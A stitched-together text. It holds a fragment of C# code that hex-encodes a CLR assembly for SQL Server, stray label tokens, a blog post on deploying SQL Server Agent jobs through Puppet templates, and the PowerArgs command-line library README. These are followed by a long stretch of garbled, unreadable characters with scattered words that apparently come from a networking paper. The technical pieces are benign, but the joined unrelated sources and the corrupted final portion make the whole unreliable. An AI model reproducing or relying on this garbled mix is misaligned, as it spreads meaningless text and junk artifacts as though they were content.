@byte; while ((@byte = dll.ReadByte()) >= 0) bytes.AppendFormat("{0:X2}", @byte); } string sql = String.Format(sqlTemplate, clrAssembly.GetName().Name, permissionSet, bytes); return sql; } /// <summary> /// Convert clr type to sql type /// </summary> /// <param name="clrType">clr type</param> /// <returns>sql type</returns> private static string ConvertClrTypeToSql(Type clrType) { switch (clrType.Name) { case "SqlString": return "NVARCHAR(MAX)"; case "SqlDateTime": return "DATETIME"; case "SqlInt16": return "SMALLINT"; case "SqlInt32": return "INTEGER"; case "SqlInt64": return "BIGINT"; case "SqlBoolean": return "BIT"; case "SqlMoney": return "MONEY"; case "SqlSingle": return "REAL"; case "SqlDouble": return "DOUBLE"; case "SqlDecimal": return "DECIMAL(18,0)"; case "SqlBinary": return "VARBINARY(MAX)"; default: throw new ArgumentOutOfRangeException(clrType.Name + " is not a valid sql type."); } }
__label__pos
0.987267
Adding SQL Server Agent Jobs using Puppet I find Puppet Enterprise to be very useful for configuring our many SQL Servers.  It does a nice job of setting up the SQL Instance and doing some base configuration.  There were a few things I wanted to add that it didn’t do out of the box that I thought I’d share.  One need I had was there was a set of specific SQL Agent jobs that I deployed out to our servers that I wanted Puppet to lay down for me.  I was able to build a pseudo-resource using the PE sqlserver forge module and some T-SQL.  I call it a pseudo-resource because it’s not a real resource in Puppet (with all the backing Ruby classes), but it behaves very much like a resource. To do this, I needed the puppetlabs/sqlserver module and I had to create two files in my Puppet code repository. NOTE: You must have Puppet Enterprise to use the puppetlabs/sqlserver module! The first file I had to create was a T-SQL template that would generate the code needed to add the SQL Agent job.  This template is not 100% fully-featured, and a lot  more variables can be added to fully flesh out all of its options, but this is a very solid start.  I named this file sql_agent_job.epp and dropped it in my “templates” folder.  It looks like this: <%- | String $name, String $description, String $notifyOperator = "", Array[Hash] $steps, Any $schedules = undef | -%> BEGIN TRANSACTION BEGIN TRY DECLARE @ReturnCode INT SELECT @ReturnCode = 0 IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1) BEGIN EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]'; IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback END; This isn’t the complete file (see my link below for the entire thing), but it gives you the idea. The template gets called by the .pp class file, which is below. The second file is the actual Puppet class (.pp extension).  This is the file that implements the template and makes the whole thing “resource-like”.  This file belongs in your “manifests” folder in your repository or module: class sqlserver::sql_agent_job() {   define sql_agent_job   (     String $sqlInstanceName,     String $description,     String $notifyOperator,     Array[Hash] $steps,     Any $schedules = undef   )   {    sqlserver_tsql { "${title}_${sqlInstanceName}_sql_agent_job" :       instance    => $sqlInstanceName,       command     => epp("sqlserver/sql_add_job.epp", {                         name            => $name,                         description     => $description,                         notifyOperator  => $notifyOperator,                         steps           => $steps,                         schedules       => $schedules                       }),       onlyif      => "IF NOT EXISTS ( SELECT * FROM msdb.dbo.sysjobs WHERE name = '${name}' ) BEGIN                         THROW 51000, '${name} job not present.', 10;                     END;"     }   } } Note:  You have to make sure the call to epp(…) above points to the path your template is at.  In the example above, I presume it’s in the same module in the templates/sqlserver folder.  Your folder structure should look roughly like this: manifests/ /sqlserver/sql_add_job.pp templates/ /sqlserver/sql_add_job.epp This is the resource you will actually drop in you profile classes to add jobs to servers. The input parameters are as follows: # PARAMETERS: # name => (namevar) Specifies the name of the agent job. - https://msdn.microsoft.com/en-us/library/ms182079.aspx # sqlInstanceName => Specifies the SQL Server instance. # description => Specifies the description on the job. # notifyOperator => Specifies the name of the job operator to notify. # steps => An array of hashes specifying the job steps: # name => String - The name of the job step # command => String - The T-SQL to execute # database => String - The name of the database to execute against if the subsystem is TSQL. # onSuccess => Integer - 3(next)|2(quitfail)|1(quitsuccess)|4(gotostep), default is 1 # onFail => Integer - 3(next)|2(quitfail)|1(quitsuccess)|4(gotostep), default is 2 # onSuccessStepId => Integer - The stepid to go to on success # onFailStepId => Integer - The stepid to to go in failure # subsystem => String - Specify either "TSQL" or "CmdExec". Default is TSQL. # outputFileName => String - Specify the path to the file to write the output to. # schedules => (optional) A hash specifying a job schedule. - https://msdn.microsoft.com/en-us/library/ms366342.aspx # frequencyType => Integer - 1(once)|4(daily)|8(weekly)|16(monthly), default 4 # frequencyInterval => Integer - (once) - not used | (daily) - every frequencyInterval days | (weekly) - frequencyinterval determines day of wek | (monthly) - determines day of the month # frequencySubdayType => Integer - 1(attime)|4(minutes)|8(hours), default 1 # frequencySubdayInterval => Integer - number of minutes/hours # frequencyRecurrenceFactor => Integer - Number of weeks/months between exectutions. Nonzero value required if frequencytype is 8|16|32 (not used otherwise). Default is 0. # activeStartTime => "HHMMSS, default 0", # activeEndTime => "HHMMSS, default 235959" You’ll probably notice the parameter names and values are pretty much identical to the input parameters for sp_add_job, sp_add_jobstep and sp_add_jobschedule stored procedures. A trick I use when I want to take a job and add it to Puppet is to add the job to SQL Server first, set it up the way I want, then script the job out. The parameters in the T-SQL script will pretty much translate to the sql_agent_job resource. Here is an example of a profile with the sql_agent_job resource in use: profile::sqlserver::component::sql_agent_job::sql_agent_job { "${name}_my_agent_job":       name                  => "My SQL Agent Job",       sqlInstanceName       => $name,       description           => 'This is my SQL Agent Job being deploying wiht Puppet.',       notifyOperator        => 'SQLTeam',       steps                 => [{                                 name      => 'Execute Test Script',                                 database  => 'master',                                 subsystem => 'TSQL',                                 command   => "SELECT 'test data here'",                                 onSuccess => 1,                                 onFail    => 2                               }],       schedules             => {                                 frequencyType           => 4,                                 frequencyInterval       => 1,                                 frequencySubdayType     => 4,                                 frequencySubdayInterval => 30,                                 activeStartTime         => 000000,                                 activeEndTime           => 235959                               },     } The full versions of these files can be found in my GitHub repository here: Enjoy! Leave a Reply Fill in your details below or click an icon to log in: WordPress.com Logo You are commenting using your WordPress.com account. Log Out /  Change ) Google+ photo You are commenting using your Google+ account. Log Out /  Change ) Twitter picture You are commenting using your Twitter account. Log Out /  Change ) Facebook photo You are commenting using your Facebook account. Log Out /  Change ) Connecting to %s
__label__pos
0.708263
Popularity 4.9 Declining Activity 7.2 Declining 530 29 56 Code Quality Rank: L3 Programming language: HTML License: MIT License Tags: Parser     Command     Line     Argument     Power Args alternatives and similar packages Based on the "CLI" category. Alternatively, view Power Args alternatives based on common mentions on social networks and blogs. Do you think we are missing an alternative of Power Args or a related project? Add another 'CLI' Package README Binary PowerArgs is available at the Official NuGet Gallery. As of version 3.0.0 PowerArgs targets .NET Standard 2.0 so that it can run cross platform. Version 3.0 requires VS 15.3 if you want to use PowerArgs from .NET 4.6.1. Overview PowerArgs converts command line arguments into .NET objects that are easy to program against. It also provides a ton of additional, optional capabilities that you can try such as argument validation, auto generated usage, tab completion, and plenty of extensibility. You can even build a full-blown, interactive text UI application like this one. It can also orchestrate the execution of your program. Giving you the following benefits: • Consistent and natural user error handling • Invoking the correct code based on an action (e.g. 'git push' vs. 'git pull') • Focus on writing your code Here's a simple example that just uses the parsing capabilities of PowerArgs. The command line arguments are parsed, but you still have to handle exceptions and ultimately do something with the result. // A class that describes the command line arguments for this program public class MyArgs { // This argument is required and if not specified the user will // be prompted. [ArgRequired(PromptIfMissing=true)] public string StringArg { get; set; } // This argument is not required, but if specified must be >= 0 and <= 60 [ArgRange(0,60)] public int IntArg {get;set; } } class Program { static void Main(string[] args) { try { var parsed = Args.Parse<MyArgs>(args); Console.WriteLine("You entered string '{0}' and int '{1}'", parsed.StringArg, parsed.IntArg); } catch (ArgException ex) { Console.WriteLine(ex.Message); Console.WriteLine(ArgUsage.GenerateUsageFromTemplate<MyArgs>()); } } } Here's the same example that lets PowerArgs do a little more for you. The application logic is factored out of the Program class and user exceptions are handled automatically. The way exceptions are handled is that any exception deriving from ArgException will be treated as user error. PowerArgs' built in validation system always throws these type of exceptions when a validation error occurs. PowerArgs will display the message as well as auto-generated usage documentation for your program. All other exceptions will still bubble up and need to be handled by your code. // A class that describes the command line arguments for this program [ArgExceptionBehavior(ArgExceptionPolicy.StandardExceptionHandling)] public class MyArgs { // This argument is required and if not specified the user will // be prompted. [ArgRequired(PromptIfMissing=true)] public string StringArg { get; set; } // This argument is not required, but if specified must be >= 0 and <= 60 [ArgRange(0,60)] public int IntArg {get;set; } // This non-static Main method will be called and it will be able to access the parsed and populated instance level properties. public void Main() { Console.WriteLine("You entered string '{0}' and int '{1}'", this.StringArg, this.IntArg); } } class Program { static void Main(string[] args) { Args.InvokeMain<MyArgs>(args); } } Then there are more complicated programs that support multiple actions. For example, the 'git' program that we all use supports several actions such as 'push' and 'pull'. As a simpler example, let's say you wanted to build a calculator program that has 4 actions; add, subtract, multiply, and divide. Here's how PowerArgs makes that easy. [ArgExceptionBehavior(ArgExceptionPolicy.StandardExceptionHandling)] public class CalculatorProgram { [HelpHook, ArgShortcut("-?"), ArgDescription("Shows this help")] public bool Help { get; set; } [ArgActionMethod, ArgDescription("Adds the two operands")] public void Add(TwoOperandArgs args) { Console.WriteLine(args.Value1 + args.Value2); } [ArgActionMethod, ArgDescription("Subtracts the two operands")] public void Subtract(TwoOperandArgs args) { Console.WriteLine(args.Value1 - args.Value2); } [ArgActionMethod, ArgDescription("Multiplies the two operands")] public void Multiply(TwoOperandArgs args) { Console.WriteLine(args.Value1 * args.Value2); } [ArgActionMethod, ArgDescription("Divides the two operands")] public void Divide(TwoOperandArgs args) { Console.WriteLine(args.Value1 / args.Value2); } } public class TwoOperandArgs { [ArgRequired, ArgDescription("The first operand to process"), ArgPosition(1)] public double Value1 { get; set; } [ArgRequired, ArgDescription("The second operand to process"), ArgPosition(2)] public double Value2 { get; set; } } class Program { static void Main(string[] args) { Args.InvokeAction<CalculatorProgram>(args); } } Again, the Main method in your program class is just one line of code. PowerArgs will automatically call the right method in the CalculatorProgram class based on the first argument passed on the command line. If the user doesn't specify a valid action then they get a friendly error. If different actions take different arguments then PowerArgs will handle the validation on a per action basis, just as you would expect. Here are some valid ways that an end user could call this program: • Calculator.exe add -Value1 1 -Value2 5 outputs '6' • Calculator.exe multiply /Value1:2 /Value2:5 outputs '10' • Calculator.exe add 1 4 outputs '5' - Since the [ArgPosition] attribute is specified on the Value1 and Value2 properties, PowerArgs knows how to map these arguments. If you wanted to, your action method could accept loose parameters in each action method. I find this is useful for small, simple programs where the input parameters don't need to be reused across many actions. [ArgActionMethod, ArgDescription("Adds the two operands")] public void Add( [ArgRequired][ArgDescription("The first value to add"), ArgPosition(1)] double value1, [ArgRequired][ArgDescription("The second value to add"), ArgPosition(2)] double value2) { Console.WriteLine(value1 + value2); } You can't mix and match though. An action method needs to be formatted in one of three ways: • No parameters - Meaning the action takes no additional arguments except for the action name (i.e. '> myprogram.exe myaction'). • A single parameter of a complex type whose own properties describe the action's arguments, validation, and other metadata. The first calculator example used this pattern. • One or more 'loose' parameters that are individually revivable, meaning that one command line parameter maps to one property in your class. The second calculator example showed a variation of the Add method that uses this pattern. Metadata Attributes These attributes can be specified on argument properties. PowerArgs uses this metadata to influence how the parser behaves. • [ArgPosition(0)] This argument can be specified by position (no need for -propName) • [ArgShortcut("n")] Lets the user specify -n • [ArgDescription("Description of the argument")] • [ArgExample("example text", "Example description")] • [HelpHook] Put this on a boolean property and when the user specifies that boolean. PowerArgs will display the help info and stop processing any additional work. If the user is in the context of an action (e.g. myprogram myaction -help) then help is shown for the action in context only. • [ArgDefaultValue("SomeDefault")] Specify the default value • [ArgIgnore] Don't populate this property as an arg • [StickyArg] Use the last used value if not specified. This is preserved across sessions. Data is stored in /AppData/Roaming/PowerArgs by default. • [TabCompletion] Enable tab completion for parameter names (see documentation below) Validator Attributes These attributes can be specified on argument properties. You can create custom validators by implementing classes that derive from ArgValidator. • [ArgRequired(PromptIfMissing=bool)] This argument is required. There is also support for conditionally being required. • [ArgExistingFile] The value must match the path to an existing file • [ArgExistingDirectory] The value must match the path to an existing directory • [ArgRange(from, to)] The value must be a numeric value in the given range. • [ArgRegex("MyRegex")] Apply a regular expression validation rule • [UsPhoneNumber] A good example of how to create a reuable, custom validator. Custom Revivers Revivers are used to convert command line strings into their proper .NET types. By default, many of the simple types such as int, DateTime, Guid, string, char, and bool are supported. If you need to support a different type or want to support custom syntax to populate a complex object then you can create a custom reviver. This example converts strings in the format "x,y" into a Point object that has properties "X" and "Y". public class CustomReviverExample { // By default, PowerArgs does not know what a 'Point' is. So it will // automatically search your assembly for arg revivers that meet the // following criteria: // // - Have an [ArgReviver] attribute // - Are a public, static method // - Accepts exactly two string parameters // - The return value matches the type that is needed public Point Point { get; set; } // This ArgReviver matches the criteria for a "Point" reviver // so it will be called when PowerArgs finds any Point argument. // // ArgRevivers should throw ArgException with a friendly message // if the string could not be revived due to user error. [ArgReviver] public static Point Revive(string key, string val) { var match = Regex.Match(val, @"(\d*),(\d*)"); if (match.Success == false) { throw new ArgException("Not a valid point: " + val); } else { Point ret = new Point(); ret.X = int.Parse(match.Groups[1].Value); ret.Y = int.Parse(match.Groups[2].Value); return ret; } } } Generate usage documentation from templates (built in or custom) PowerArgs has always provided auto-generated usage documentation via the ArgUsage class. However, the format was hard coded, and gave very little flexibility in terms of the output format. With the latest release of PowerArgs usage documentation can be fully customized via templates. A template is just a piece of text that represents the documentation structure you want along with some placeholders that will be replaced with the actual information about your command line application. There are built in templates designed for the console and a web browser, and you can also create your own. In its latest release, PowerArgs adds a new method called ArgUsage.GenerateUsageFromTemplate(). The method has several overloads, most of which are documented via XML intellisense comments. The part that needs a little more explanation is the template format. To start, let's talk about the built in templates. The first one, the default, is designed to create general purpose command line usage documentation that is similar to the older usage documentation that PowerArgs generated. You can see what that template looks like here. The second one is designed to create documentation that looks good in a browser. You can see what that template looks like here. Here is an example of what the built in browser usage looks like. You can create your own templates from scratch, or modify these default templates to suit your needs. The templating engine was built specifically for PowerArgs. It has quite a bit of functionality and extensibility, but for now I'm only going to document the basics. Most of you probably use the class and attributes model when using PowerArgs, but under the hood there's a pretty extensive object model that gets generated from the classes you build. That model is what is bound to the template. If you're not familiar with the object model you can explore the code here. You can see from the built in templates that there is placeholder syntax that lets you insert information from the model into template. For example, if your program is called 'myprogram' then the following text in the template would be replaced with 'myprogram'. {{ExeName !}} is the best // outputs - 'myprogram is the best' Additionally, you can add a parameter to the replacement tag that indicates the color to use when printed on the command line as a ConsoleString. You can use any ConsoleColor as a parameter. {{ExeName Cyan !}} You can also choose to conditionally include portions of a template based on a property. Here's an example from the default template: {{if HasActions}}Global options!{{if}}{{ifnot HasActions}}Options!{{ifnot}}: In this case, if the HasActions property on the CommandLineArgumentsDefinition object is true then the usage will output 'Global options'. Otherwise it will output 'Options'. This flexibility is important since some command line programs have only simple options while others expose multiple commands within the same executable (e.g. git pull and git push). Another thing you can do is to enumerate over a collection to include multiple template fragments in your output. Take this example. {{each action in Actions}} {{action.DefaultAlias!}} - {{action.Description!}} !{{each}} If your program has 3 actions defined then you'd get output like this. action1 - action 1 description here action2 - action 2 description here action3 - action 3 description here When referring to a part of your data model you can also navigate objects using dot '.' notation. Notice in the example above I was able to express {{ action.DefaultAlias !}}. You could go even deeper. For example {{ someObj.SomeProperty.DeeperProperty !}}. More advanced expressions like function calling with parameters are not supported. PS I'm pretty happy with the templating solution. In fact, hidden in PowerArgs is a general purpose template rendering engine that I've found useful in other projects for things like code generation. You can actually bind any string template to any plain old .NET object (dynamic objects not supported). Here's a basic sample: var renderer = new DocumentRenderer(); var document = renderer.Render("Hi {{ Name !}}", new { Name = "Adam" }); // outputs 'Hi Adam' Ambient Args Access your parsed command line arguments from anywhere in your application. MyArgs parsed = Args.GetAmbientArgs<MyArgs>(); This will get the most recent insance of type MyArgs that was parsed on the current thread. That way, you have access to things like global options without having to pass the result all throughout your code. Secure String Arguments Support for secure strings such as passwords where you don't want your users' input to be visible on the command line. Just add a property of type SecureStringArgument. public class TestArgs { public SecureStringArgument Password { get; set; } } Then when you parse the args you can access the value in one of two ways. First there's the secure way. TestArgs parsed = Args.Parse<TestArgs>(); SecureString secure = parsed.Password.SecureString; // This line causes the user to be prompted Then there's the less secure way, but at least your users' input won't be visible on the command line. TestArgs parsed = Args.Parse<TestArgs>(); string notSecure = parsed.Password.ConvertToNonsecureString(); // This line causes the user to be prompted Tab Completion Get tab completion for your command line arguments. Just add the TabCompletion attribute and when your users run the program from the command line with no arguments they will get an enhanced prompt (should turn blue) where they can have tab completion for command line argument names. [TabCompletion] public class TestArgs { [ArgRequired] public string SomeParam { get; set; } public int AnotherParam { get; set; } } Sample usage: someapp -some <-- after typing "-some" you can press tab and have it fill in the rest of "-someparam" You can even add your own tab completion logic in one of two ways. First there's the really easy way. Derive from SimpleTabCompletionSource and provide a list of words you want to be completable. public class MyCompletionSource : SimpleTabCompletionSource { public MyCompletionSource() : base(MyCompletionSource.GetWords()) {} private static IEnumerable<string> GetWords() { return new string[] { "SomeLongWordThatYouWantToEnableCompletionFor", "SomeOtherWordToEnableCompletionFor" }; } } Then just tell the [TabCompletion] attribute where to find your class. [TabCompletion(typeof(MyCompletionSource))] public class TestArgs { [ArgRequired] public string SomeParam { get; set; } public int AnotherParam { get; set; } } There's also the easy, but not really easy way if you want custom tab completion logic. Let's say you wanted to load your auto completions from a text file. You would implement ITabCompletionSource. public class TextFileTabCompletionSource : ITabCompletionSource { string[] words; public TextFileTabCompletionSource(string file) { words = File.ReadAllLines(file); } public bool TryComplete(bool shift, string soFar, out string completion) { var match = from w in words where w.StartsWith(soFar) select w; if (match.Count() == 1) { completion = match.Single(); return true; } else { completion = null; return false; } } } If you expect your users to sometimes use the command line and sometimes run from a script then you can specify an indicator string. If you do this then only users who specify the indicator as the only argument will get the prompt. [TabCompletion("$")] public class TestArgs { [ArgRequired] public string SomeParam { get; set; } public int AnotherParam { get; set; } } The PowerArgs.Cli (undocumented) namespace The PowerArgs.Cli namespace contains framework components that make it easy to build very interactive command line applications. This namespace is undocumented since these capabilities are still a work in progress. When it gets closer to being ready I'll document the classes just like the rest of PowerArgs.
__label__pos
0.948602
You are on page 1of 22 c         c             !!"!#$ %  &     ð              "   '   c     c           c   c   c  !" #$%  & "%%' &  !( "))*  & + %  ++ (%  %   + !"  (%  & +( !" )  " ,+ % +  & "  !+& -&+ ../+$+++   & ++ (%% + "01" %  +( %+  ( (+" !+(  (+ ( (%%+   "- % (+ + % ( $ (+)+ 2&+ ../-+ !"(&%+(%-&%%  +3++ !"14#2*  +"#"+)&)+* &+&++%+   2 %    ( " !     %%  / %++ .  + " + % ((& +    ($ 2  " !0&+ . -&%% $ +" % +% ($ + %-  " 2  " 2 " (+ +    % +(+( %+  ( (+ " ! &%% &+ ..-  +( & %  &+ !"% +)+&+ ../  ( + " 2 (+ 3  + "- % +    2- % %+ (" !  #(  !5 *+ &%% (2 r ( (    (2( "  / 0  (& ((  ) +   & 66 78 #(  &   "    ( " !*-  +(%($  78" !0(( 5& 2- (   ((+( % (  & & 66 0 +   0 + ((    % (- +  (+ ()++ ++&  +-  +2+ "09 ()(   -    -   -  % ( (( /    &- "  %+% ((+     +)+ &+ . -  &+ (+%%+ &%% &+ . 6- &%%  (++%++%%((+%" 2  ") + " 2  & +& + " % ((  5& 2- &%% (%8   +   & ) % % " 2  )%(+ &+ . -" ( " !0 % ( "  /    ( % " (% "($  &"  / (( +%((   2 - &%% (+  - ((-  (& &+  +  (   2         (& % ((  + "09 % 5& 2- &    ( $  )+(%%+  ((+ + "09 % +- "  & ((  $  " 2% (-%((& 2#% ((&  - &%% ($ .  *- % (    +)+  %++ &+ . - &+ % (  " !0  +)+ " $+% ($  (% " 2 + % 2+ 7   ((% ((+%+" 2-&%%"+(%%  -+&(+ +%+%($+  ÿ  + 1" #1401&) "+  )&)+*  & +& + "09 %    ( .  %    +)+ + !  & "- (%% " & :(( : + ! % (%&+ & (( ++( !(%  &  3 " ! !( -   "- (+ %  (+(% &!(;!(+!!(;$+% &%((+ 1" !((- +& %  %  )  ++ (%+%(%+1" !(;-+& % (%(% 1" % $ ++- ( +(+  +&  + %<!7=9>1' < ? ! !(;!(+! 75 2 ) =& 9 3 >1! 1   (5 %(% % % $ % % " 2 - &  +  1" %    #+ % (%*"++&++%  &#!"0@"*- +$%3 +1" &3 /2+"%! "%2+#+ *-%%+(& (%%++" 2+ 2% ( ( 1"-&%%&  Ä ((    (&' (    % #)5 )( *  &  + !- 1" $+% (%8 %+ + 1" ) ( % (%%+ % +- &%%   % 1"  !  &  : +%22 :-((&( + 1" ((& .   + #  %+ ++   %   %+ % %+*  ((+   " 2 +&  -   1" /2 % ( %   " 2 -   + " % & ((  +  - + 1" ((  +   % +(+  (  &  % %+  & " 2- (  + ((& 5& ($ /2 - + " % ( (&  & (+ % (&  (   (+ ++ % %+-  + +% %+ ( &-+2+1"+%%+&++(%(%+"09%+- %+%A1B) +#AB2+* + 1"  (%  &%% /   ) -  78- &%% ((+(%) & 0(%# )* 1" $+% %+&  )  +1" ð+ (    #$%- - %%*  & - ( (- /-6 ( (- /6 ( ( _ c    _  (%+( "   c%c($  2  & &  ((+ (  ( % +  & %  1;+( ! #1!*  &+ .  1! ((   %%  //  .-  $+  &     (-  ($ (+ %  % )%%&   + (+   & (+ ( % $+  ) +  +& + 5 ++  +( +& ((+  2 (+-   #  2*  ( ‘  % ()% 3 5   2   & 1  !  ( 5   2 # %%&*%(%%+  %2 % (  (   )& +  ++  ( 2(  $+ + %  2 0- (   ( (   (%%+ +    Bð  2 0 & )   & (+&   2  (+- $ & (    2  & ( &+ .6 +%C!92 D   ÿ *  c%c""$  2  & % ()(+   % $+   & %  1;+(!&+ .6    %  2   2 (-5 +++ +%%    ( & &+    ((  + +  3-  & (+& ++ %( % &+ + % %%+  % +(+(  +  2  ((%+&  (      E +  ( -  (    %  1;+(- ((%+&( ! 0$+%29   Ä v (!()$ + + (+ + (+  % %+  ( ( + " (%  & "  !   % + "111 6.  + +  %   + %  + %    &%% % % (   )%   $  + % $   +( %  ((+% + + +2(  ++ +(+&     +& ((+ % +  ( ++ +  % ((+! ð-((-  &+ . / & + +(+( % (    & %+  %  22(  7   $+% ((+% +& ++ 3 % ()%+&  + + +(+(%%%&53  ++()+&(+&)&%&  &+ 4 )( % / ( 5 +   + + %+ ! ð % )% &++- ((- !"-   (  3  (+ (& )(  $% 1&-  F %)   - ( !) 0/ )&  ) -   %  )  )&   (  ") ++ (%%+ ( % 5 + 3   3 5  % (%%+  + +(+7 0  ),&)"@"  + +( +++'  G+ +(+H%"1116. GF#"0914+*H%"111 .. GBF#14)++* G+ )& "09+   # _c _v c +, $ :"   !(+ FD- (  "     & ( % (+ % )% ++ (   & 3  + &+  & %  :"   !(+:   ((+    &     #(+3/ * % !  ( -( F   %(( $) F +(%( / ((( #(%%+   @*(+( +%($ ˜ +  $+  %3 ) )&(   #*  & -66 78 "    + + 2 "+  )&)+ #"* % + + F  F% (  (2(  % ! %  -   F +  (  (  % (     +  (    (   +  >(+ % ( - )+  + % % )% ++ ! $ ++ (%%+     $IF & %  & + % (+ %+  ( " !   (& K %+ % &+ / - (+ %   %   +   4 _ c + $ + "#       *(%  & +& ((( (  & "% % " !  &+ .  "   % ( 2  $%  &+ .  ++F+ ( )% ++ &++% +  (&- " ((+% +++ (%+(+ & % (  (( +( %  ++  %+% + " (+ + % ) % % & (+ )++   ++ & %((%)&-(+ ( + 2$  -6678#)) )" !" !0 F I  ! ð*- % + 2    +  78 # /  ! ð  " !0(+      78  (  5    78  (+ ( *" @0 !$+% (%%+ + 2 "+ $+%   2( %  (  % "  +(+ ?7(+ 5 !4 + !0 %   -  78 ++%  & &5 ((&( %(2(+2 + %    $+%   +& + %  &  ) &"+& (%++ ($( &5  (+% & %  ((+ +2+ ++ !(-++%( (%&+"   ) _ (!Ä()$ + 1" #1401&) "+  )&)+*  & +& + "09 %    ( .  %    +)+ + !  & "- (%% " & :(( : + ! % (%&+ &  ((   ++ (  !   (%  &  3 " ! !( -   "- (+ %  (+(%  & !(; !(+ ! r !(; $+% & % ((+ 1" !((- +& %  %  )  ++ (%+ %(% + 1"   !(;-   +&  % (%(% 1" % $ ++-(+(+ +&+%<!7=9>1  (5 %(% % % $ % % " 2-&+1"%#+% (%* "+ + & + + %   &  #!"0@"*-+$%3 + 1"    & 3 /2  + " %    !  " % 2 + #+    *- %%+(&(%%++" 2+ 2% ( (   1"- &%% &   ((    (&' (    % #)5 )( *  &  + !- 1" $+% (%8 %+ + 1" ) ( % (%%+ % +- &%% %1"! & : +%22 :-((& ( +1"((&. +#%+++  %   %+ % %+*  ((+   " 2 +&  -   1" /2 % ( %   " 2 - +"%&(( +-+1"((  +   % +(+ (  &  % %+  & " 2- (  + ((& 5& ($ /2 - + " % ( (&  & (+ % (&  (   (+ ++ % %+-  ++%%+ (&-+2+1"+%%+& ++ (%(% + "09 % +- % + % A1 B)  + #AB2+* + 1"  (%  &%% /   ) -  78- &%%   ((+( %  )  &  0 (% # )* 1" $+% %+&  )    + 1"ð+( #$%- -%%* & -( (- /-6( (- /6( (   h r v- -  c+ÿ$ )!&  0/ (  (+ F   %  78 FE %  #". *-#" *6#" 6*3 % F- B!+ B!/E 666#".60.66*% "  F/% % F+(%2(%E    #". * " 0/  )% ++  % + % (  % !(00F(+( !(% %+- &5 %  0/ ((  + "9 2 + ( "9 #3) "9* % ( (+ (+ + %  +%  %+ &90/-% (!"9#( "9*%(+  ( % ++ 0/ ++ ($ % + (  % !00F   ( _c  c        $  +  &" %+ ) ( !" (+ + %  %+%   +% % + (88 + + &  !" (( $%%++("09)%%'3- >"!-) -+)- 2   !" &  +) 78- $+ / +/- /,+%%+  !"&) $(+&%%% "  (+  ( !" &+ .. ++( +( ð+ (() %%+ !"- "  (( !" % ( +  &%%3(% ++% !"    è _  !"#  ‘    * & +& (+ + $%%%  &>"F ./#()>   "+* (+  %+ ++ (% % +0++ + % ( ( +     & )&&+ .  %%+(+((%%+!" && è -!2@9-)-+!"(%%+)  % - -+ / + %!"(( ++&-++ ++  ++& % +% )     % +  (  &   ((2) +    3  (    ()(3!"' G!"2 +&+ .  ((   +-)  78 A  ((+% ( 6 % &++% ) 2 )& G!"2/ &+ ../% + / + ) 78 G!"2 %(++%)% &%%((& ( &    "! . v-  $ >++  & ++ )&+ /2 +- 5  (%  " % %  >+)& 5    % ( >++>+)&+ +(  +<% ++>+)& (-  ++ B  ") B2B( >++ (+ (+  (+ &4"+(#14 *- !(+->F7   %%+ +( >++  & + % + + ""  (  %+  (() 2- 2- / 2-  /2 5- (%%+ ++ + ++ %%- ( &)+%% ++%  0   "" *_ (+ % &      %  + )%% !"    % ((  )&  -(+- +'+$+&3(+#!(;-1!-"- r " -)->1!->& )(*(2( ()%+++   "09 ) &  % &  ( ð3  +#ð*  ++%ð' G (&+((%( +$+( !+  G (&+((+)%++((% "09+ G7+$ % +%%&++% G(+  2 "09 G(+& (%  2  % & ( % (+ G +(% +%ð G+&   "ÿ / 0  þ &  & ( %%    %+ ( %  % +  ++     2(+  "111 .   ((  "111 .  % ( B  ( 2- %#/ 1 -"111 . B*(2((+$+$  % ((+ (%(%)%)-(2   (%   #* <  ( %  + %& % %)  + ð , + < & % (+)+  <  #"111 . * %   &+/ <  (( ) +    "111 .  &+ + #+ "111 .  + < *-  ((+ (%&   (  ) 2     (&)-"111 . $+%((+%+%$% &$+& % &+ + +&   <   ( $%    (+2%2  (++  2%2  ( (( $+&  (- %   <  &  ((+% $+&  (  5 + %(+- )  $%+%+%$ %%+  rr +%%+ 5' G)+%%%  G C) 22D #  * - (  (+& # (  <5 F *  %+% (    < %(+% %+%0%+ G ($-< (  (((+&%% $ (+&  G  (+%   2)  &+ ((   ++ (%%%%+$(+%#   * G(+ ((+%  (%  (      < ) -(%%%%+$+2(  G %+ &  &+ (+%  (+ H% (2  +- (   (%%+ )   #  * G   ((5 %  (  5 &%%  (% %%+  G%%()()%(+- G +  + % # *- &%%  %  & +  +((   "Ä _2v A12 /+ & 2"5 A1+&++%%    +% ( 9 &  2- A12 /  (%&  3+  ++ (  (   &  + %+ / 2 &+&(&ð+((&++/ 2- /2 2 ((  ( (( & &+ ) %%(+%% +% A1+(%&+ .  -  &  +-  % +  /2 ( +E A12 /   + 2 1+)- & &&-  ((+ ++ )((+( /0++&)+%%     rÿ "# _ - !!#‘        ‘ * &  + ++ +     % %+  ( )  +       + + ((+% +    +%2 (+  #(/  (+*) -%(+) !+ +&(+A12!!   5  +  & ( 19>1 J K %  1ð@   &+ .6/ J/K-  ( + %- (   +    #5* ++  +%2 (+    %  &  ++ (  (+   (+  7%&5    !%     7%&5A70(+!$+% &%+  !!( +"111' 2  & 2   )))#L2L2)* 2 .   )&7%&5( 2 . &%&5( 2 6/@ 2()!! 2 6+4 )) ))0+ 2 6 9@@>++!!  ( 5 +- (+  %  &   M%  %  //   %  ++ (+     %  % +   %  ++ )    (    (  + # 2 * +& & &) % &+ /+%# 2 *+%- 26 &(()+%( ) (+ -( 2/  &(+ +%% () (+    +%%(%(+ -+%2+%%  +' G"2!& G=2!8 G!2!)      "  *_Ä    %  ð + 3 + ($ &  % (5 )    $  &+ ..( ð/ +&%%+ % ((+&+++%(%%- (+)+  &+% %(ð    N +( ð /    %  & :‰  ð:-ð    (+)+  %  & C  D -  %  & )  %  +(   % ð / - )   ((  %   )    #(%  * +    0 )   5  +& ()++ ++ ((+& ++&  +    + >(+ % % ++&  % (  #  7A*- ð /  ($( (   $+ (%&   ð     ((  ) /   # -/ ,* #% )   -  ,0  0*>  4 &ð/ ð+()%   %% -( ) +   ð   + /& r )(# *-++% +( + & % ð/    c  *_ Ä!                                          ˜  +%%+-ð  (%8 % ð /  (  + +#  * >(++ $ $%ð/ (%)%(($ + ð    % ( ( ((+ &5 $  ð /   ð     ($  2 O M%  + %- +  ð  